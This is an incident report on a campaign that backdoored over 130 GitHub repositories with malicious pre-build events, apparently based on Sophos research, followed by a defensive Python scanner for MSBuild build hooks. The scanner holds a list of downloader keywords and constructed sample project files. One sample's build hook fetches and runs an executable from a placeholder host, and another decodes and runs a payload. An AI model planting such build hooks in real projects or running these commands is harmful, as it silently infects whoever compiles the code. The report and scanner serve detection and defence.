Full Report
Sophos has uncovered a scheme planting malicious code in 130+ GitHub repositories, targeting hackers and gamers
Analysis Summary
# Incident Report: Widespread Backdoored Open-Source Repository Campaign
## Executive Summary
Cybersecurity researchers uncovered a large-scale operation involving over 130 backdoored GitHub repositories, disguised as useful tools, game cheats, and hacking utilities. The campaign, attributed to an actor using the alias "ischhfd83," automatically generated commits to maintain credibility while planting hidden malware designed to steal information from other cybercriminals and novice hackers. The incident highlights the risks associated with consuming unvetted code from open-source platforms.
## Incident Details
- Discovery Date: Not stated precisely; the activity was discovered around June 4, 2025.
- Incident Date: Ongoing campaign; the first identified tool was traced to this actor.
- Affected Organization: GitHub (Platform), Sophos (Discovered the activity)
- Sector: Technology/Cybercrime Ecosystem (Targeting other threat actors)
- Geography: Global (Due to the nature of GitHub repositories)
## Timeline of Events
### Initial Access
- Date/Time: Not definitively established, but the campaign was active prior to discovery.
- Vector: Supply chain compromise via malicious open-source repositories on GitHub.
- Details: Repositories were uploaded disguised as highly desirable tools (e.g., game cheats, hacking tools). Genuine code was present alongside hidden malicious components.
### Lateral Movement
- Details: The core mechanism was a "PreBuild" event within the weaponized repositories. When a user (the intended victim) compiled the downloaded project, the event executed silently, downloading and installing secondary, undisclosed malware.
### Data Exfiltration/Impact
- Details: The ultimate goal was likely information theft from the secondary victims (other cybercriminals/hackers). Specific exfiltration methods are not detailed, but the initial payload delivered additional malware.
### Detection & Response
- Date/Time: Prior to June 4, 2025.
- How it was discovered: A Sophos customer queried the safety of a specific repository named `Sakura RAT`.
- Response actions taken: Sophos analysts investigated the initial artifact, traced the associated email address, and identified the network of 141 related repositories.
## Attack Methodology
- Initial Access: Compromising trusted platforms (GitHub) by uploading malicious repository packages.
- Persistence: Automation used (auto-generated commits) to simulate continuous, legitimate development activity.
- Privilege Escalation: Not explicitly detailed for the host system; the compromise escalated when the hidden "PreBuild" event executed during an otherwise legitimate compilation.
- Defense Evasion: Concealment of secondary payloads within the build process.
- Credential Access: Likely a goal of the secondary malware payload, targeting credentials of the user compiling the code.
- Discovery: Reconnaissance became possible once the victim compiled the deceptive repositories.
- Lateral Movement: Progression from the downloaded and compiled repository to the execution of the hidden downloaders.
- Collection: The secondary malware harvested data.
- Exfiltration: Not detailed.
- Impact: Infection of users who downloaded and compiled the malicious code.
## Impact Assessment
- Financial: Not quantified, but high potential for financial impact on the secondary victims (cybercriminals).
- Data Breach: Highly likely theft of credentials, tools, or proprietary information from other threat actors.
- Operational: Disruption to the operations of the victimized cybercriminals/hackers.
- Reputational: Minor reputational impact on GitHub (as the distribution platform) and significant reputational damage to the actor "ischhfd83."
## Indicators of Compromise
- **Network Indicators (Conceptual):** Connections to domains distributing secondary malware post-compilation.
- **File Indicators (Conceptual):** Presence of malicious scripts triggered by the "PreBuild" event within repository code. Samples include project repository names related to game cheats, hacking tools, and crypto utilities.
- **Behavioral Indicators:** Automated, high-volume commit activity simulating active development across numerous repositories.
## Response Actions
- Containment measures: Researchers identified and analyzed the backdoored repositories.
- Eradication steps: Reporting the malicious repositories to GitHub for removal (implied).
- Recovery actions: Victims using these tools would need to scan environments, remove the secondary malware, and reset compromised identities.
## Lessons Learned
- Open-source supply chain risk is severe, even when targeting niche communities like hackers and gamers.
- Attackers are using deceptive automation (auto-commits) to maintain the facade of legitimate, active projects.
- The use of seemingly benign compilation events (like "PreBuild") to trigger hidden malware execution is a potent injection technique.
## Recommendations
- Implement strict scanning and vetting procedures for all third-party libraries or starter projects pulled from public repositories.
- Developers should not let build scripts (such as pre-build events) run automatically when compiling code from unknown sources.
- Organizations should monitor internal developer activities for unusual repository cloning or high compilation rates linked to suspicious external sources.
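The "PreBuild" mechanism described under Timeline of Events and the recommendation above to review build scripts before compiling untrusted code both come down to one check: find every shell command an MSBuild project will run on "Build" and look at it before building. The scanner below is an added example written for this report, not Sophos's tooling or a published IoC list. It assumes Visual Studio-style `.csproj`/`.vcxproj` XML, collects `PreBuildEvent`/`PostBuildEvent`/`PreLinkEvent` elements and `<Exec>` tasks in custom targets, and marks any hook whose command matches download-or-decode keywords as high risk; the keyword list and the three sample project files are constructed for the example, and the domain in the backdoored sample is a reserved placeholder.

```python
"""Scan MSBuild project files for build-time command hooks.

Added example, not Sophos's tooling. It walks the project XML for the places
where MSBuild runs arbitrary shell commands during a build and reports each
one, flagging commands that look like a downloader or decoder.
"""
import re
import xml.etree.ElementTree as ET

# Elements whose text (or <Command> child) MSBuild executes as a shell command.
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}

# Keyword patterns a defender would flag in a build hook. Constructed list for
# this example; it is not a published indicator set.
SUSPICIOUS_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"downloadfile",
    r"\bcurl\b", r"\bwget\b", r"bitsadmin", r"certutil",
    r"-enc(odedcommand)?\b", r"frombase64string", r"start-process",
    r"\bmshta\b", r"regsvr32", r"rundll32",
]
_SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS_PATTERNS), re.IGNORECASE)


def _local(tag):
    """Drop the MSBuild XML namespace so tags compare by local name."""
    return tag.rsplit("}", 1)[-1]


def find_build_hooks(project_xml):
    """Return every command MSBuild would run as part of a build.

    Each hook is {"kind": <where it lives>, "command": <shell command>}.
    Handles both layouts: .csproj puts the command text directly inside
    <PreBuildEvent>, .vcxproj nests it in a <Command> child.
    """
    root = ET.fromstring(project_xml)
    parents = {child: parent for parent in root.iter() for child in parent}
    hooks = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in EVENT_TAGS:
            cmd_child = next((c for c in elem if _local(c.tag) == "Command"), None)
            command = (cmd_child.text if cmd_child is not None else elem.text) or ""
            if command.strip():
                hooks.append({"kind": name, "command": command.strip()})
        elif name == "Exec":
            # <Exec> in a custom <Target> runs at the phase named by the
            # target's BeforeTargets/AfterTargets attribute.
            target = parents.get(elem)
            if target is not None and _local(target.tag) == "Target":
                phase = target.get("BeforeTargets") or target.get("AfterTargets") or "explicit"
                kind = f"Exec in Target {target.get('Name', '?')} ({phase})"
            else:
                kind = "Exec"
            hooks.append({"kind": kind, "command": (elem.get("Command") or "").strip()})
    return hooks


def classify(hook):
    """Attach keyword hits; a non-empty hit list means HIGH risk."""
    hits = sorted({m.group(0).lower() for m in _SUSPICIOUS_RE.finditer(hook["command"])})
    return {**hook, "hits": hits, "risk": "HIGH" if hits else "REVIEW"}


def scan_project(project_xml):
    """Scan one project file; every hook is returned so a human can review it."""
    return [classify(h) for h in find_build_hooks(project_xml)]


# Constructed sample: an ordinary project whose pre-build step copies a config file.
BENIGN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>copy "$(ProjectDir)appsettings.json" "$(TargetDir)"</PreBuildEvent>
  </PropertyGroup>
</Project>"""

# Constructed sample modelled on the technique in the report: the project builds
# normally, but compiling it first fetches and runs a second stage. The domain
# is a reserved placeholder, not a real indicator.
BACKDOORED_CSPROJ = """<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>powershell -NoProfile -w hidden -c "Invoke-WebRequest http://stage2.example.invalid/s -OutFile s.exe; Start-Process s.exe"</PreBuildEvent>
  </PropertyGroup>
</Project>"""

# Constructed sample of the other layout: a custom target hooked before Build.
HOOKED_VCXPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="certutil -decode payload.b64 payload.exe &amp;&amp; payload.exe" />
  </Target>
</Project>"""


if __name__ == "__main__":
    for label, xml in [("benign", BENIGN_CSPROJ), ("backdoored", BACKDOORED_CSPROJ), ("hooked", HOOKED_VCXPROJ)]:
        for hook in scan_project(xml):
            print(f"[{hook['risk']}] {label}: {hook['kind']}: {hook['command']}  hits={hook['hits']}")
```

Run it over every project file in a freshly cloned repository before opening the solution in an IDE; anything marked HIGH should be read line by line, and even REVIEW hooks deserve a glance, since a benign-looking copy command is exactly what a repository of this kind would sit beside.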